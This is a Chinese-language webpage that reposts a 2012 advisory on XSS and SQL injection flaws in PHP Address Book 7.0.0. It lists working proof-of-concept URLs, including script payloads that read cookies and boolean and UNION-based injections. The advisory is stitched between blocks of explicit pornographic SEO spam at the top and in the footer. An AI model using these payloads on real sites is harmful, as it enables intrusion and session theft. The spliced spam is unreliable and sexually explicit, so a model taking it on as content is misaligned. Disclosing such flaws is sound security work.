男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學堂
  • ·聯系電話:+86.023-75585550
  • ·聯系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 常見技術問題
PHP Address Book 7.0.0多個缺陷及修復
更新時間:2012-05-25 | 發布人:本站 | 點擊率:738

 標題: PHP Address Book 7.0.0 Multiple security vulnerabilities

作者: Stefan Schurtz
受影響軟件: Successfully tested on PHP Address Book 7.0.0
開發者網站: http://sourceforge.net/projects/php-addressbook/
缺陷描述
 
PHP Address Book 7.0.0含多個 XSS 和 SQLi缺陷
 
測試方法
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
 
修復:
加強過濾
分享到: QQ空間 新浪微博 開心網 人人網
相關文章
主站蜘蛛池模板: 暗交小拗女一区二区三区| 亚洲欧美中文字幕5发布| 丰满人妻熟妇乱偷人无码| 中文字幕乱码人在线视频1区| 色爱区综合五月激情| 国产极品美女高潮无套在线观看 | 日本aaaaa片特黄aaaa| 最新亚洲av电影网站| 好爽轻点太大了太深了| 香蕉久久精品日日躁夜夜躁夏| 成全高清在线播放电视剧| 破了亲妺妺的处免费视频国产| 亚洲av成人无码网站| 国产精品久久久久精品日日| 特级欧美aaaaaa片| 无套内射蜜桃小视频| 久久成人国产精品一区二区| 忘忧草www日本韩国| a亚洲va欧美va国产综合| cijilu在线视频| 国产乱码一区二区三区爽爽爽| 中文在线8资源库| 国产精品国产三级国产aⅴ下载| 人妻互换 综合| 免费a级毛片出奶水| 国产精品久久精品国产| 另类 专区 欧美 制服丝袜| 跪趴式啪啪gif动态图27报| 丁香花在线| 我把寡妇日出水了| 色呦呦 国产精品| 最好好看的中文字幕| 国产精品视频露脸| 美女脱个精光露出奶头和尿口| 姐姐6电视剧在线观看| 浮力影院50826| 免费无码又爽又刺激软件下载直播| 毛片无码国产| 在线观看日本亚洲一区| 国产美女遭强高潮网站| 精品色卡一线二线三线的|